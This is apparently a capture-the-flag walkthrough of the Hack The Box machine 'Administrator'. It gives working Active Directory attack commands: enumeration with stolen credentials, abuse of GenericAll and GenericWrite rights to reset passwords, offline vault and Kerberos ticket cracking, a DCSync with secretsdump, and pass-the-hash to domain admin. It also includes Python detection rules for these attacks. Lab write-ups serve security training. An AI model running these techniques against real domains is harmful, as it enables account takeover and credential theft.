
Nmap Results
# Nmap 7.94SVN scan initiated Tue Nov 19 11:36:32 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.133.9
Nmap scan report for 10.129.133.9
Host is up (0.089s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 23:37:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
50942/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
50947/tcp open msrpc Microsoft Windows RPC
50950/tcp open msrpc Microsoft Windows RPC
50967/tcp open msrpc Microsoft Windows RPC
56722/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-11-19T23:38:07
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 19 11:38:16 2024 -- 1 IP address (1 host up) scanned in 103.96 seconds
We can see the DC hostname in the SMB script results, as well as the administrator.htb domain name in the LDAP output. Now would be a good time to add those hostnames to your /etc/hosts file.
echo -e '10.129.133.9\t\tDC.administrator.htb administrator.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/445
smbclient -U 'administrator.htb/Olivia%ichliebedich' -L //DC.administrator.htb
ADMIN$ or C$ shares.
TCP/21

The credentials Olivia:ichliebedich do not appear to be valid for the FTP service.
TCP/88
impacket-GetADUsers -all 'administrator.htb/Olivia:ichliebedich'
Paste the GetADUsers output into a heredoc, keep only the user rows (those with a 2024 timestamp or <never>), and write the account names to users.txt:
cat << EOF | grep -E '2024|never' | cut -d ' ' -f 1 > users.txt
Administrator 2024-10-22 14:59:36.285281 2024-11-19 18:34:44.183103
Guest <never> <never>
krbtgt 2024-10-04 15:53:28.687272 <never>
olivia 2024-10-05 21:22:48.769574 2024-11-19 18:56:38.542617
michael 2024-10-05 21:33:37.049043 <never>
benjamin 2024-10-05 21:34:56.558374 2024-10-05 22:14:53.199541
emily 2024-10-30 19:40:02.775756 2024-10-30 17:23:46.169276
ethan 2024-10-12 16:52:14.117811 <never>
alexander 2024-10-30 20:18:04.165508 <never>
emma 2024-10-30 20:18:35.259255 <never>
EOF
impacket-GetNPUsers -usersfile users.txt -no-pass administrator.htb/
impacket-GetUserSPNs 'administrator.htb/olivia:ichliebedich' -request
TCP/389
LdapDomainDump
ldapdomaindump -u 'administrator.htb\Olivia' -p 'ichliebedich' -o ldd ldap://DC.administrator.htb
open ldd/domain_users_by_group.html
The Remote Management Users group can WinRM into the box. We can also see that our current user, Olivia Johnson, is in the group and has the PASSWD_NOTREQD flag set.
Bloodhound
faketime "$(ntpdate -q DC.administrator.htb | cut -d ' ' -f 1,2)" bloodhound-python -c All -u 'olivia' -p 'ichliebedich' -d 'administrator.htb' -ns 10.129.133.9
sudo neo4j console &
Start the Bloodhound database
sudo bloodhound &
Start the Bloodhound GUI




Exploit
WinRM as Olivia
evil-winrm -i DC.administrator.htb -u 'olivia' -p 'ichliebedich'
Post-Exploit Enumeration
Operating Environment
Current User
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Users and Groups
See ldapdomaindump output
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.133.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Privilege Escalation
Lateral to Michael
net user Michael 'NewPassword1!' /domain
GenericAll DACL
evil-winrm as Michael
Lateral to Benjamin
Change Benjamin's Password
# Run from the WinRM session as Michael; Set-ADAccountPassword needs the ActiveDirectory module, which is present on the DC.
$targetUser = 'benjamin'
$benjaminNewPassword = ConvertTo-SecureString -AsPlainText -Force 'NewPassword1!'
# Michael's password was set to NewPassword1! in the previous step.
$michaelPass = ConvertTo-SecureString -AsPlainText -Force 'NewPassword1!'
$michaelCreds = [PSCredential]::new("administrator.htb\michael", $michaelPass)
# -Reset performs an administrative reset (no old password needed), which is what the GenericAll right allows.
Set-ADAccountPassword -Identity $targetUser -NewPassword $benjaminNewPassword -Credential $michaelCreds -Reset -Confirm:$false
Which Share?


ftp> binary
ftp> get Backup.psafe3

Using the Google search operator intext:psafe3, I found that this file type is associated with this program
Cracking the Password Safe

Use the pwsafe2john parser to generate a hash for cracking the password that opens the password vault.
pwsafe2john Backup.psafe3 > hash
john --wordlist=rockyou.txt hash
Backu:tekieromucho
We can download the latest pwsafe client for Linux from here


Lateral to Emily
evil-winrm -i 'DC.administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
evil-winrm as Emily
GenericWrite on Ethan
GenericWrite DACL by adding an X.509 certificate (shadow credential) to Ethan's user object in Active Directory. I was able to add the certificate, but the KDC refused to authenticate with the error: KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type). So, I went with the forced Kerberoasting option instead.
Now that we have a session as Emily, we can abuse the GenericWrite DACL on Ethan's Active Directory user object and set or change the ServicePrincipalName attribute. With an SPN set, we can request a TGS, as Ethan is now treated like a service account. Then we can crack the TGS offline to recover Ethan's password, since the ticket is encrypted with a key derived from that password.
Get-ADObject -Filter 'samAccountName -like "ethan"' | Set-ADObject -Add @{ServicePrincipalName='pwn/pwn'}
Get-ADObject -Filter 'samAccountName -like "ethan"' -Property ServicePrincipalName
ServicePrincipalName property and verify the changes
faketime "$(ntpdate -q DC.administrator.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs 'administrator.htb/olivia:ichliebedich' -dc-ip 10.129.133.9 -request
john --wordlist=~/Pentest/WordLists/rockyou.txt hash
Ethan:limpbizkit
Lateral to Ethan
Now that we are in possession of Ethan's password, we can authenticate and perform a DCSync attack with Impacket.
impacket-secretsdump -outputfile 'dcsync' -dc-ip 10.129.133.9 'administrator.htb/ethan:limpbizkit@DC.administrator.htb'
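From the defender's side, both the forced Kerberoasting above (SPN written on a user object, then an RC4 service ticket requested for that account) and the DCSync step leave distinct traces in the domain controller's Security log. The following is an added example, not code from the original write-up: it runs two correlation rules over constructed event records shaped like the relevant fields of event IDs 5136, 4769 and 4662. The DC$ allow-list and the sample records are assumptions; the replication-right GUIDs are the real Active Directory values.

```python
from datetime import datetime, timedelta

# Control-access rights that DCSync needs; these GUIDs are the real AD values.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
DC_ACCOUNTS = {"DC$"}  # machine accounts expected to replicate (assumption)

T0 = datetime(2024, 11, 19, 23, 40)
SAMPLE_EVENTS = [  # constructed records; only the fields the rules use
    {"id": 5136, "ts": T0, "subject": "emily", "class": "user",
     "object": "ethan", "attribute": "servicePrincipalName", "value": "pwn/pwn"},
    {"id": 4769, "ts": T0 + timedelta(minutes=2), "subject": "olivia",
     "service": "ethan", "etype": "0x17"},          # RC4 ticket: crackable
    {"id": 4769, "ts": T0 + timedelta(minutes=3), "subject": "olivia",
     "service": "krbtgt", "etype": "0x12"},         # AES, normal traffic
    {"id": 4662, "ts": T0 + timedelta(hours=1), "subject": "ethan",
     "access": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"id": 4662, "ts": T0 + timedelta(hours=1), "subject": "DC$",
     "access": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},  # legitimate DC
]

def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """5136 writing servicePrincipalName on a user object, followed within
    `window` by a 4769 RC4 (0x17) service-ticket request for that account.
    Returns (writer, target, requester) tuples; the requester may differ
    from the writer, as in the write-up (Emily writes, Olivia requests)."""
    hits = []
    for w in events:
        if not (w["id"] == 5136 and w.get("class") == "user"
                and w.get("attribute", "").lower() == "serviceprincipalname"):
            continue
        for e in events:
            delta = e["ts"] - w["ts"]
            if (e["id"] == 4769 and e.get("etype") == "0x17"
                    and e.get("service", "").lower() == w["object"].lower()
                    and timedelta(0) <= delta <= window):
                hits.append((w["subject"], w["object"], e["subject"]))
    return hits

def detect_dcsync(events):
    """4662 carrying a replication GUID from an account that is not a DC."""
    return [(e["subject"], e["access"]) for e in events
            if e["id"] == 4662 and e["subject"] not in DC_ACCOUNTS
            and e.get("access", "").lower() in DCSYNC_GUIDS]

if __name__ == "__main__":
    print(detect_targeted_kerberoast(SAMPLE_EVENTS))
    print(detect_dcsync(SAMPLE_EVENTS))
```

In production the same rules would be fed from 5136 (requires an auditing SACL on the domain object), 4769 and 4662 via your SIEM; the AES-only 4769 and the DC$ replication are deliberately left unflagged to show the rules' selectivity.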
Becoming Domain Admin
Finally, we can use a pass-the-hash attack to authenticate to the domain controller as the domain administrator.
evil-winrm -i 'DC.administrator.htb' -u 'Administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
Flags
User
0798cac7f876546fc18403265ad8be7as
Root
7e174606791ca784dd1c32ec228cef26
